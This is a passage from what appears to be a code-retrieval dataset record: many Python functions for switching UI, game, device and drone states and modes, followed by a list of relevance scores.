event):\n if self.vehicle.get_manual_mode_change(reset=True):\n data = lambda: None\n data.mode_to_set = \"Inactive\"\n self.set_companion_mode(data)", "def _updateState(self):\n\n self.changeColorBtn.setEnabled(self.transformTypeCbx.isChecked() or self.shapeTypeCbx.isChecked())", "def state_preview_do(cfg, app, win, events):", "def state_changed(self):\n if self.goto and self.get_position() != self.c.p:\n 
self.goto_node()\n\n if self.mode == 'edit':\n self.edit_frame.show()\n self.view_frame.hide()\n elif self.mode == 'view':\n self.edit_frame.hide()\n self.view_frame.show()\n else:\n self.edit_frame.show()\n self.view_frame.show()\n\n self.update_position(self.c.p)", "def switch_state():\n\tDmg.OpenWindow()", "def __toggle_mode(self):\n # Update mode\n # Update mode, default canvas controls\n self.__ui_mode = {\n UImode.CANVASCONTROL: UImode.TEACHPANEL,\n UImode.TEACHPANEL: UImode.CANVASCONTROL\n }.get(self.__ui_mode, UImode.CANVASCONTROL)\n\n # Update UI\n # get list of robots\n new_list = []\n for name in self.__ui_controls.get('menu_robots').choices:\n new_list.append(name)\n\n self.__reload_caption(new_list)", "def _SetMode(self, newmode, msg):\n self.buffer = u'' # Clear buffer from last mode\n self.mode = newmode\n # Update status bar\n evt = ed_event.StatusEvent(ed_event.edEVT_STATUS, self.stc.GetId(),\n msg, ed_glob.SB_BUFF)\n wx.PostEvent(self.stc.GetTopLevelParent(), evt)", "def on_state_change(self, new_state):\n self.state = new_state", "def run_states(self):\n if (self.state == \"off\"):\n if (self.in_power.value == 1):\n self.off_to_on()\n \n elif self.state == \"on\":\n if (self.in_power.value == 0):\n self.any_to_off()\n elif (self.in_alert.value == 1):\n self.on_to_alert()\n \n elif self.state == \"alert\":\n if (self.in_power.value == 0):\n self.any_to_off()\n elif (self.in_alert.value == 0):\n self.alert_to_was_alert()\n\n elif self.state == \"was_alert\":\n if (self.in_power.value == 0):\n self.any_to_off()", "def __change_state(self, state):\n self.state = state", "def setMode(self, mode):\n self.mode = mode\n if self.mode == 0:\n self.setDrawingMode()\n elif self.mode == 1:\n self.setConstructionMode()\n elif self.mode == 2:\n self.setDisplayMode()\n self.context.text.append(\"mode: \" + self.messages[self.mode])", "def state_cb(self, msg):\n self.prev_state = deepcopy(self.current_state)\n self.current_state = msg\n\n if self.current_state.mode == \"MANUAL\":\n if self.offboard_point_streaming:\n rospy.loginfo(\"Setpoint stream DISABLED\")\n self.stop_streaming_offboard_points()\n\n if self.current_state.mode == \"POSCTL\":\n if not self.offboard_point_streaming:\n rospy.loginfo(\"Setpoint stream ENABLED\")\n self.start_streaming_offboard_points()\n if not self.prev_state.mode == \"POSCTL\":\n # just switched into POSCTL, call hover\n self.hover()\n\n if self.current_state.mode == \"OFFBOARD\":\n if not self.prev_state.mode == \"OFFBOARD\":\n # just switched to OFFBOARD, call move\n rospy.loginfo(\"Entering OFFBOARD Mode\")\n for i in range(0,len(velocities)):\n maneuver_velocity_setpoint=velocities[i]\n maneuver_reference_frame = maneuver_reference_Frame\n maneuver_duration=duration[i]\n self.execute_maneuver( self.maneuver_velocity_setpoint, \n self.maneuver_reference_frame, \n self.maneuver_duration)", "def _change_mode(self, new_mode: MODES):\n # Deactivate old mode_handler:\n self.mode_handler.deactivate()\n self.mode_handler = self.MODE_HANDLER[new_mode](self)\n self._set_tooltip(new_mode)", "def set_old_states(modes):\n for mode in modes:\n if mode['name'] in old_modes_states:\n mode['state'] = old_modes_states[mode['name']]\n if mode.get('sub'):\n set_old_states(mode['sub'])", "def on_mode_changed(self):\n\n if self.mode.currentText() != self.ScaleCustom:\n self.width.setEnabled(False)\n self.height.setEnabled(False)\n self.resolution.hide()\n else:\n self.width.setEnabled(True)\n self.height.setEnabled(True)\n self.resolution.show()", "def mode(self, 
value):\r\n if value != self._mode:\r\n if str(value).lower() == 'edit':\r\n if self._mode == 'read':\r\n self.stop_reading()\r\n self._mode = 'edit'\r\n self.start_editing()\r\n elif str(value).lower() == 'read':\r\n if self._mode == \"edit\":\r\n self.stop_editing(save=False)\r\n self._mode = \"read\"\r\n elif value is None:\r\n if self._mode == 'edit':\r\n self.stop_editing(save=False)\r\n elif self._mode == 'read':\r\n self.stop_reading()", "def temporary_mode_switch(event, value, condition, mode):\n if value.current:\n release_exec.register(\n gremlin.control_action.switch_to_previous_mode,\n event\n )\n gremlin.control_action.switch_mode(mode)", "def set_mode(self, mode):\n self.mode = mode\n self.btn_mode.setText(f\"{mode.title()}\\u25BE\")\n self.state_changed()", "def __set_mode(self, value):\n # update Nuke\n localization.setMode(str(value.lower()))\n # update panel UI\n logger.debug('disabling pause button: %s', value=='Off')\n # if the localization mode is off diasble pause and force widgets\n self.pauseBtn.setDisabled(value == 'Off')\n self.updateBtn.setDisabled(value == 'Off')\n self.__update_pause_icon()", "def change_state(self, state, interface=None):\n \n self._state = state\n if interface != None:\n self._interface = interface\n \n if self._state == config.GS_LOADING:\n \n # Background with loading text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n draw_text(self._background, (180, 180), 'Loading...', 36,\n self._white, self._pygame)\n \n elif self._state == config.GS_GAME:\n \n # Background with static text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n \n draw_text(self._background, (410, 130), 'Score:', 10,\n self._white, self._pygame)\n draw_text(self._background, (410, 190), 'Lines Cleared:', 10,\n self._white, self._pygame)\n \n next_text = 'Next ' + \\\n config.names[self._interface.get_order()].title() + ':'\n draw_text(self._background, (410, 250), next_text, 10,\n self._white, self._pygame)\n \n # Grid\n w = 210 + 10 - self._interface.get_field().get_size()[0] + 1\n h = 420 + 10 - self._interface.get_field().get_size()[1] + 1\n self._grid = self._pygame.Surface((w, h))\n self._grid = self._grid.convert()\n self._grid.fill((0, 0, 0))\n self._grid.set_colorkey((0, 0, 0))\n \n elif self._state in [config.GS_MENU, config.GS_MENU_ENTER_HIGHSCORE,\n config.GS_MENU_HIGHSCORES]:\n \n # Background with static text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n \n draw_text(self._background, (110, 300), 'Settings:', 10,\n self._white, self._pygame)\n draw_text(self._background, (130, 340), 'Difficulty Level:', 10,\n self._white, self._pygame)\n draw_text(self._background, (130, 400), 'Polyomino Order:', 10,\n self._white, self._pygame)\n \n draw_text(self._background, (370, 300), 'Audio:', 10,\n self._white, self._pygame)\n draw_text(self._background, (400, 340), 'Sound Effects:', 10,\n self._white, self._pygame)\n draw_text(self._background, (400, 400), 'Music:', 10,\n self._white, self._pygame)\n \n # Buttons\n self._buttons = {}\n start_game_button = Button('Start Game', 10, (90, 150))\n self._buttons.update({config.MENU_START: start_game_button})\n view_highscores_button = Button('View Highscores', 10, (90, 180))\n 
self._buttons.update({config.MENU_HIGHSCORES: view_highscores_button})\n help_button = Button('Help', 10, (90, 210))\n self._buttons.update({config.MENU_HELP: help_button})\n quit_button = Button('Quit', 10, (90, 240))\n self._buttons.update({config.MENU_QUIT: quit_button})\n \n # Radio Selections\n self._radios = {}\n level_selection = Radio_Selection([str(n + 1) for n in range(9)],\n 10, (160, 365))\n self._radios.update({config.MENU_LEVEL: level_selection})\n order_selection = Radio_Selection([str(n + 1) for n in range(6)],\n 10, (160, 425))\n self._radios.update({config.MENU_ORDER: order_selection})\n sfx_selection = Radio_Selection(['On', 'Off'], 10, (435, 365))\n self._radios.update({config.MENU_SFX: sfx_selection})\n music_selection = Radio_Selection(['On', 'Off'], 10, (435, 425))\n self._radios.update({config.MENU_MUSIC: music_selection})\n \n # Highscores Screen\n self._highscores = self._pygame.Surface((250, 300))\n self._highscores = self._highscores.convert()\n self._highscores.fill((0, 0, 0))\n \n draw_text(self._highscores, (15, 10), 'Highscores:', 10,\n self._white, self._pygame)\n \n # Enter highscore name screen\n self._enterhighscore = self._pygame.Surface((250, 210))\n self._enterhighscore = self._enterhighscore.convert()\n self._enterhighscore.fill((0, 0, 0))\n self._name_entry = Text_Entry(3, ['A', 'A', 'A'], 20, (85, 105))\n \n # Help Screen\n self._help = self._pygame.Surface((410, 240))\n self._help = self._help.convert()\n self._help.fill((0, 0, 0))\n \n draw_text(self._help, (15, 10), 'Controls:', 10, self._white,\n self._pygame)\n draw_text(self._help, (205, 10), 'Instructions:', 10,\n self._white, self._pygame)\n \n draw_text(self._help, (20, 45), 'Up - Rotate', 10, self._white,\n self._pygame)\n draw_text(self._help, (20, 75), 'Left - Move Left', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 105), 'Right - Move Right', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 135), 'Down - Move Down', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 165), 'Space - Drop', 10, self._white,\n self._pygame)\n draw_text(self._help, (20, 195), 'Esc - Pause', 10, self._white,\n self._pygame)\n \n text = config.instructions\n rect = self._pygame.Rect(0, 0, 190, 190)\n instructions = render_textrect(text, 8, rect, self._white,\n (0, 0, 0), 0, self._pygame)\n self._help.blit(instructions, (210, 45))", "def state_chosen_enter(cfg, app, win):", "def state(self, state: str) -> None:", "def state_processing_enter(cfg, app, win):", "def _update_on_active(self):\n pass", "def set_state(self, state: ApplicationState) -> None:\n self.state = state\n if state == ApplicationState.IDLE:\n self.generate_cards.config(text=\"Generate Bingo Game\")\n elif state == ApplicationState.GENERATING_GAME:\n self.generate_cards.config(text=\"Stop Generating Game\")\n else: # state == ApplicationState.GAME_GENERATED\n self.generate_cards.config(text=\"Regenerate Game\")", "def update_to_state(self, game_state):\n pass", "def set_current_operation_mode(self, operation_mode):\n self._current_operation_mode = operation_mode\n \"\"\"Retrieve from textual representation\"\"\"\n if self._current_operation_mode == 'Off':\n self._api._opmode = 0;\n elif self._current_operation_mode == 'Heat only':\n self._api._opmode = 1;\n elif self._current_operation_mode == 'Cool only':\n self._api._opmode = 2;\n elif self._current_operation_mode == 'Heat & Cool':\n self._api._opmode = 3; \n self._api.set()\n self.schedule_update_ha_state()", "def state(self):\n pass", "def 
_select_mode(self):\n self.__check_mode()\n if self.mode[\"auto_mode\"]:\n self.mode_auto()\n elif self.mode[\"auto_mode\"] is None: # Do Nothing\n self.mode_standby()\n else:\n self.mode_manual()", "def state_preview_enter(cfg, app, win):", "def mode (self, mode) :\r\n self.mode_ = mode", "def change_state(self,state):\n if self.__currentState:\n self.__currentState.stop()\n \n try:\n idler=self[state]\n except KeyError:\n raise \"%s is not a state of %s\" % (state,self)\n \n self.__currentState=idler()\n self.__currentState.idle()\n self.__currentState=None", "def handle_state(self):\r\n if self.state == 'walk':\r\n self.walking()\r\n elif self.state == 'fall':\r\n self.falling()\r\n elif self.state == 'jumped on':\r\n self.jumped_on()\r\n elif self.state == 'shell slide':\r\n self.shell_sliding()\r\n elif self.state == 'death jump':\r\n self.death_jumping()", "def on_state_change(self, state):\n return state", "def set_state(self):\r\n if self.mode.get(): # write\r\n self.text.config(**self.textOpt)\r\n else:\r\n self.text.config(state=\"disabled\", bg=\"lightgrey\", fg=\"darkgrey\")\r\n if self.useEncryption.get(): # use AES\r\n self.keyEntry.config(**self.keyOpt)\r\n app.useAES = True\r\n else:\r\n self.keyEntry.config(state=\"disabled\")\r\n app.useAES = False\r\n length = app.parse_string(app.tmp)\r\n self.usedBytes.set(length)\r\n self.set_status()\r\n if self.loaded: # a file is loaded\r\n if self.mode.get() == 0: # read mode\r\n ok = True\r\n elif app.data != None and self.usedBytes.get() <= self.totalBytes.get():\r\n ok = True\r\n else:\r\n ok = False\r\n else:\r\n ok = False # no file loaded\r\n if ok:\r\n self.startButton.config(state=\"normal\")\r\n else:\r\n self.startButton.config(state=\"disabled\")", "def setup_mode():\n status_label.color = WHITE\n status_label.text = \"-SET-\"\n\n ave_label.color = BLACK # Turn off average label and value display\n ave_value.color = BLACK\n\n max_value.text = str(MAX_RANGE_F) # Display maximum range value\n min_value.text = str(MIN_RANGE_F) # Display minimum range value\n\n time.sleep(0.8) # Show SET status text before setting parameters\n status_label.text = \"\" # Clear status text\n\n param_index = 0 # Reset index of parameter to set\n\n setup_state = \"SETUP\" # Set initial state\n while setup_state == \"SETUP\":\n # Select parameter to set\n setup_state = \"SELECT_PARAM\" # Parameter selection state\n while setup_state == \"SELECT_PARAM\":\n param_index = max(0, min(2, param_index))\n status_label.text = SETUP_COLORS[param_index][0]\n image_group[param_index + 226].color = BLACK\n status_label.color = BLACK\n time.sleep(0.25)\n image_group[param_index + 226].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.25)\n\n param_index -= get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_index = param_index - 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_index = param_index + 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"ADJUST_VALUE\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Adjust parameter value\n param_value = int(image_group[param_index + 230].text)\n\n while setup_state == \"ADJUST_VALUE\":\n param_value = max(32, min(157, param_value))\n image_group[param_index + 230].text = 
str(param_value)\n image_group[param_index + 230].color = BLACK\n status_label.color = BLACK\n time.sleep(0.05)\n image_group[param_index + 230].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.2)\n\n param_value += get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_value = param_value + 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_value = param_value - 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"SETUP\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Exit setup process\n status_label.text = \"RESUME\"\n time.sleep(0.5)\n status_label.text = \"\"\n\n # Display average label and value\n ave_label.color = YELLOW\n ave_value.color = YELLOW\n return int(alarm_value.text), int(max_value.text), int(min_value.text)", "def init_state(self):\n self.read_inputs()\n if (self.in_power.value == 1) and (self.in_alert.value == 1):\n self.state = 'alert'\n elif (self.in_power.value == 1):\n self.state = 'on'\n else:\n self.state = 'off'\n self.leave_init()", "def change_mode(self, mode):\r\n self.update_enrollment(mode=mode)", "def currentMode(self, state):\n logger.debug(\"Func: currentMode/setter\")\n\n if not type(state) is bool:\n if bool is 0:\n state = False\n elif bool is 1:\n state = True\n else:\n msg = (\"only boolean or 0-1 accepted, entered %s\" %state)\n logger.error(msg)\n # raise Exception([101, msg])\n self._exception(101, msg)\n return\n self._setCurrents(\"currentMode\", state)", "def _enum_callback(self, *args):\n\t\tnew_value = args[1].get_string()\n\n\t\t# No need to change the state if it's already as the user want.\n\t\t# Cases \"m1 m1\" or \"b1 b1\" or \"b1 m1\" or \"m1 b1\"\n\t\tif new_value == args[0].get_state().get_string():\n\t\t\treturn\n\n\t\t# Actually change the state to the new value.\n\t\targs[0].set_state(GLib.Variant.new_string(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()", "def update(self):\n self._state = 23", "def _on_state_change(\n self, entity: Union[str, dict], attribute: str, old: str, new: str, kwargs: dict\n ) -> None:\n if new == self.properties[CONF_TARGET_STATE]:\n if self.properties.get(CONF_DELAY):\n self.handles[HANDLE_TOGGLE_STATE] = self.run_in(\n self._on_schedule_toggle,\n self.properties[CONF_DELAY],\n state=self.properties[CONF_SWITCH_STATE],\n )\n else:\n self.toggle(state=self.properties[CONF_SWITCH_STATE])\n else:\n if HANDLE_TOGGLE_STATE in self.handles:\n handle = self.handles.pop(HANDLE_TOGGLE_STATE)\n self.cancel_timer(handle)", "def change_player_mode(self):\n\n # Checks if player mode is 'Player vs Player'\n if self.player_mode == 'pvp':\n self.p_mode.configure(text='Player vs CPU')\n self.player_mode = 'pvc'\n self.reset_score()\n self.reset_board()\n\n else:\n self.p_mode.configure(text='Player vs Player')\n self.player_mode = 'pvp'\n self.reset_score()\n self.reset_board()", "def change_modes(self, change_list):\n\t\tprint \"CHG_MODE START\"\n\t\tfor mode_ix in range(0,len(change_list),2):\n\t\t\tsetid_and_index = self.__mode_modesetid(change_list[mode_ix])\n\t\t\tif setid_and_index is not None:\n\t\t\t\tif change_list[mode_ix+1] == True:\n\t\t\t\t\tprint \"Setting Active Set:{0} Index:{1}\".format(setid_and_index[0], 
setid_and_index[1])\n\t\t\t\t\tself.ms_all[setid_and_index[0]].activate(setid_and_index[1])\n\t\t\t\telif change_list[mode_ix+1] == False:\n\t\t\t\t\tprint \"Setting DEactive Set:{0} Index:{1}\".format(setid_and_index[0], setid_and_index[1])\n\t\t\t\t\tself.ms_all[setid_and_index[0]].deactivate(setid_and_index[1])\n\t\t\t\telse:\n\t\t\t\t\tprint \"Invalid State\"\n\t\tif 'volume' in self.ms_all:\n\t\t\tprint self.ms_all['volume'].active()\n\t\tif 'modecycle1' in self.ms_all:\n\t\t\tprint self.ms_all['modecycle1'].active()\n\t\tprint \"CHG_MODE STOP\"", "def handle_current_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg, CONF_MODE_STATE_TEMPLATE, \"_attr_hvac_mode\", CONF_MODE_LIST\n )", "def _mode_changed(self, index: int):\n if index == 0:\n self.table.setEnabled(False)\n self.table.clearSelection()\n self.name_widget.setEnabled(True)\n self.name_widget.validate_name()\n\n else:\n self.table.setEnabled(True)\n self.name_widget.setEnabled(False)\n\n self.valid_source_signal.emit(False)", "def UpdateData(self, event = None):\n ##NOTE: Will have to change way user's variables are saved if \n ##modes allow users to change these in the future.\n ##Probably by grabbing the oldMode and checking its settings.\n array = {\"JconfSelection\": [self.chJconf,\n self.chJconf.GetStringSelection()],\n \"NameServer\": [self.cbNameServer,\n self.cbNameServer.GetValue()],\n \"Xplorer\": [self.cbXplorer, self.cbXplorer.GetValue()],\n \"Conductor\": [self.cbConductor, self.cbConductor.GetValue()],\n \"DesktopMode\": [self.cbDesktop, self.cbDesktop.GetValue()],\n \"XplorerType\": [self.rbXplorer,\n XPLORER_TYPE_LIST[self.rbXplorer.GetSelection()]]}\n\n for var in array:\n ##if array[var][0].IsEnabled():\n self.state.Edit(var, array[var][1])\n self.React()\n return", "def chooseGamemode(self):\n\n # Set the gamemode when user clicks a radio button\n self.GAME_MODE = self.gamemode_var.get()", "def buttonsChangeState(self, btnState):\n c4d.StatusClear()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.DrawViews(c4d.EVMSG_CHANGEDSCRIPTMODE)\n c4d.EventAdd(c4d.EVENT_ANIMATE)\n c4d.StatusClear()\n if btnState == False:\n self.main_logo.SetImage(self.img_loading, False)\n self.auto_import_fig_but.SetImage(self.img_btnAutoImportOff_FIG, True)\n self.auto_import_prop_but.SetImage(self.img_btnAutoImportOff_PROP, True)\n self.convert_mat_but.SetImage(self.img_btnConvertMaterialsOff, True)\n self.auto_ik_but.SetImage(self.img_btnAutoIKOff, True)\n\n if btnState == True:\n self.main_logo.SetImage(self.img_d2c4dLogo, True)\n self.auto_import_fig_but.SetImage(self.img_btnAutoImport_FIG, True)\n self.auto_import_prop_but.SetImage(self.img_btnAutoImport_PROP, True)\n self.convert_mat_but.SetImage(self.img_btnConvertMaterials, True)\n self.auto_ik_but.SetImage(self.img_btnAutoIK, True)\n\n try:\n self.main_logo.LayoutChanged()\n self.main_logo.Redraw()\n except:\n print(\"DazToC4D: LayoutChanged skip...\")\n c4d.StatusClear()\n c4d.EventAdd()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.DrawViews()\n c4d.EventAdd(c4d.EVENT_FORCEREDRAW)\n c4d.DrawViews(c4d.DRAWFLAGS_FORCEFULLREDRAW)\n bc = c4d.BaseContainer()\n c4d.gui.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_CHANNEL, bc)\n return True", "def ChangeMode(self, mode):\n if mode in MODE_DICT:\n self.ImportCover(MODE_DICT[mode], layer 
= MODE_LAYER)", "def StatusChanged(self, state, info):\n pass", "def on_edit_mode(self, mode):\n self.pre_selected = None\n\n self.app.tool_bar.md_bg_color = self.app.theme_cls.primary_color\n self.app.set_lab_tool_bar()\n self.show_action_bar()", "def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)", "def change_player_state(self):\n if self.active_player.get() is True:\n # Get game phase and unlock respective buttons?\n # or should game do that\n pass\n else:\n pass\n #self.disable_all_buttons()", "def refreshStates(self):\n # Update the comboboxes\n self.updateLayersComboboxes()\n # Update the edit mode buttons\n self.updateEditState_pairsLayer()\n self.updateEditState_toBendLayer()\n # Update the transformation type\n self.updateTransformationType()", "def updateState(self):\n QtGui.QLineEdit.setText(self, self._state[0])", "def update(self):\n self._is_on = self._is_on", "def update(self):\r\n self._state = self._dev.state", "def change_ops_state(self, state):\n for op_button in self.operators.values():\n op_button['state'] = state", "def change_mode(self):\n return (self.mode + 1) % 2", "def handle_onoff_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n payload_on: str = self._config[CONF_PAYLOAD_ON]\n payload_off: str = self._config[CONF_PAYLOAD_OFF]\n\n if payload == \"True\":\n payload = payload_on\n elif payload == \"False\":\n payload = payload_off\n\n if payload == payload_on:\n setattr(self, attr, True)\n elif payload == payload_off:\n setattr(self, attr, False)\n else:\n _LOGGER.error(\"Invalid %s mode: %s\", attr, payload)\n\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def opt_statechange(self, opt, new_state):\n self.opt_dict[opt]['enabled'] = new_state", "def btnState(self, box):\n if box.text() == \"Log to File\":\n if box.isChecked():\n self.stdoutBox.setChecked(False)\n # should not edit filename\n self.logfileEdit.setReadOnly(False)\n self.debugStatements = True\n self.switchDebugOutput()\n\n if box.text() == \"Log to Stdout\":\n if box.isChecked():\n self.fileBox.setChecked(False)\n self.logfileEdit.setReadOnly(True)\n self.debugStatements = False\n self.switchDebugOutput()", "def update_state(self, act):\n\n # check the checkbox logic\n if act in ['follow', 'not_follow', 'locate', 'not_locate']:\n self.check_locate_follow_logic(act)\n # test/record logic\n print(\"update function not implemented\")", "def React(self):\n ##Disable DesktopMode if Xplorer & Conductor == False\n #self.state.React(self.state.GetSurface(\"Xplorer\") == False and\n # self.state.GetSurface(\"Conductor\") == False,\n # \"DesktopMode\", False)\n if self.state.GetSurface(\"DesktopMode\"):\n self.rbXplorer.SetSelection(0)\n \n \n self.UpdateDisplay()\n return", "def react(self):\n if self.flag == 0:\n self.state.set(\"SIMULATING\")\n self.flag = 1\n self.simulate()\n else:\n self.state.set(\"AT REST\")\n self.flag = 0", "def changeState(self, node, name, state):", "def updateState(self):\n QtGui.QLabel.setText(self, self._state[0])", "def set_mode(self, mode):\n if mode in self.MODES:\n self.mode = self.MODES[mode]", "def updateState(self):\n self.state = self.microgridPolicy.computeState();", "def state(self):\n raise NotImplementedError", "def state_choose_enter(cfg, app, win):", "def update_status_fields(self, *args):\n\n self.connection_status = 'Connection established' if 
self.ml_interface.is_connected else ('Debug' if self.debug == True else 'Disconnected')\n\n self.requested_position = self.ml_interface.requested_position\n self.standby_position = self.ml_interface.standby_position\n\n self.rp = self.ml_interface.rp\n\n if self.requested_position is '':\n self.requested_position = '0'\n\n if self.standby_position is '':\n self.standby_position = '0'\n\n if self.settingsWindow.requested_position is '':\n self.settingsWindow.requested_position = '0'\n\n if self.settingsWindow.standby_position is '':\n self.settingsWindow.standby_position = '0'\n\n if int(self.requested_position) > self.settings[\"max_position\"]:\n self.requested_position = str(self.settings[\"max_position\"])\n self.set_requested_position()\n\n if int(self.standby_position) > self.settings[\"max_position\"]:\n self.standby_position = str(self.settings[\"max_position\"])\n self.set_standby_position()\n\n if int(self.rp) >= int(self.requested_position) and self.inserted == 0:\n self.inserted = 1\n\n if(self.trigger == 'Pressed'):\n self.trig = not self.trig\n state = int(float(self.ml_interface.current_state))\n self.current_state = 'Standby' if state == 4 else ('Stopped'if state == 3 else ('Moving' if state == 2 else ('Inserted' if state == 1 else 'Retracted')))\n self.gatan_in_msg = 'Yes' if self.ml_interface.gatan_in else 'No'\n self.gatan_veto_msg = 'Yes' if self.ml_interface.gatan_veto else 'No'\n\n if int(self.settingsWindow.requested_position) > self.settings[\"max_position\"]:\n self.settingsWindow.requested_position = str(self.settings[\"max_position\"])\n\n if int(self.settingsWindow.standby_position) > self.settings[\"max_position\"]:\n self.settingsWindow.standby_position = str(self.settings[\"max_position\"])\n\n # Called last\n self._rp = self.rp", "def state_capture_do(cfg, app, win, events):", "def cb_mode_indicator(data, item, window):\n return mode" ]
[ "0.73479813", "0.7155198", "0.7146986", "0.69878197", "0.696421", "0.6945815", "0.69330287", "0.6821973", "0.67742443", "0.6771602", "0.67632943", "0.6735988", "0.67205477", "0.67016745", "0.6662783", "0.66435605", "0.6638601", "0.6633751", "0.6633751", "0.66132015", "0.66063476", "0.6585536", "0.6563236", "0.65570396", "0.6538978", "0.64908653", "0.6485233", "0.6463719", "0.64626956", "0.64322704", "0.64111805", "0.64092976", "0.6404374", "0.63963574", "0.6393677", "0.63926715", "0.6387331", "0.63489324", "0.6311325", "0.63041836", "0.6279442", "0.6271651", "0.62710893", "0.6240031", "0.62254727", "0.6224556", "0.6216838", "0.6211417", "0.6179707", "0.616119", "0.6160093", "0.6149787", "0.6137926", "0.6129301", "0.61241853", "0.6123655", "0.6086448", "0.6075143", "0.6064592", "0.60471094", "0.6043027", "0.6036841", "0.60284346", "0.6020503", "0.60201234", "0.60152483", "0.601507", "0.6014981", "0.60144633", "0.6014075", "0.6013856", "0.6004084", "0.60026824", "0.59893996", "0.5982343", "0.59787434", "0.5958687", "0.59531", "0.5944429", "0.594291", "0.59252155", "0.5924873", "0.5920115", "0.5903082", "0.58936495", "0.5880534", "0.5867622", "0.5865005", "0.58600634", "0.58590984", "0.58577675", "0.5855859", "0.58535254", "0.585103", "0.5851022", "0.5850323", "0.5841533", "0.58389753", "0.5830437", "0.5822493", "0.5820103" ]
0.0
-1
Mouse move events will be sent here whenever they change to update the UI if necessary
def mouse_move(self, pos):
        if (self.setup_type == "position"):
            x, y = pos
            self.canvas.move(x, y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_mouse_move(self, event: PointEvent):\n self.x = event.x\n self.y = event.y\n self.handle_mouse(self.x, self.y)", "def mouse_move_callback(self, event):\n # TODO drag and drop figuriek\n print(\"moving at \", event.x + self.offset_x, event.y + self.offset_y)", "def _onmove(self, event):", "def on_mouse_move(self, event):\n self.mouse = [event.xdata, event.ydata]\n\n # Update pan view on mouse move\n if self.panning is True:\n for a in self.pan_axes:\n a.drag_pan(1, event.key, event.x, event.y)\n\n # Async re-draw (redraws only on thread idle state, uses timer on backend)\n self.canvas.draw_idle()\n\n ##### Temporary place-holder for cached update #####\n self.update_screen_request.emit([0, 0, 0, 0, 0])", "def ev_MOUSEMOTION(self, event):", "def update(self):\n self.mousePos = pygame.mouse.get_pos()\n self.update_button_hover_status()", "def on_mouse_motion(self, x, y, delta_x, delta_y):\r\n pass", "def ev_mousemotion(self, event: MouseMotion) -> None:", "def on_mouse_move(self, event):\n if event.is_dragging and event.buttons[0] == 1:\n x0, y0 = event.last_event.pos[0], event.last_event.pos[1]\n x1, y1 = event.pos[0], event.pos[1]\n X0, Y0, Z0 = self.pixel_to_coords(float(x0), float(y0))\n X1, Y1, Z1 = self.pixel_to_coords(float(x1), float(y1))\n self.translate_center(X1 - X0, Y1 - Y0, Z1 - Z0)", "def mouseMoveEvent(self, event):\n if self.view_state.tracking == TrackingMode.FREE and event.buttons() == QtCore.Qt.LeftButton:\n # Calculate the change in mouse position.\n new_mouse_pos = np.array([event.x(), event.y()])\n mouse_delta = new_mouse_pos - self.view_state.mouse\n\n # Add this to the view centre.\n self.view_state.centre = self.view_state.centre - mouse_delta * (1 / self.view_state.scale)\n self.view_state.mouse = new_mouse_pos", "def on_mouse_move(self, win, xpos, ypos):\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)", "def on_mouse_move(self, win, xpos, ypos):\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)", "def handle_mouse(obj, event):\n if event:\n x = event.globalX()\n y = event.globalY()\n x_w = obj.offset.x()\n y_w = obj.offset.y()\n obj.move(x - x_w, y - y_w)", "def mouseMoveEvent(self, event: 'QGraphicsSceneMouseEvent'):\n new_cursor_position = event.scenePos() # mouse cursor in scene coordinates\n old_cursor_position = event.lastScenePos()\n offset_x = 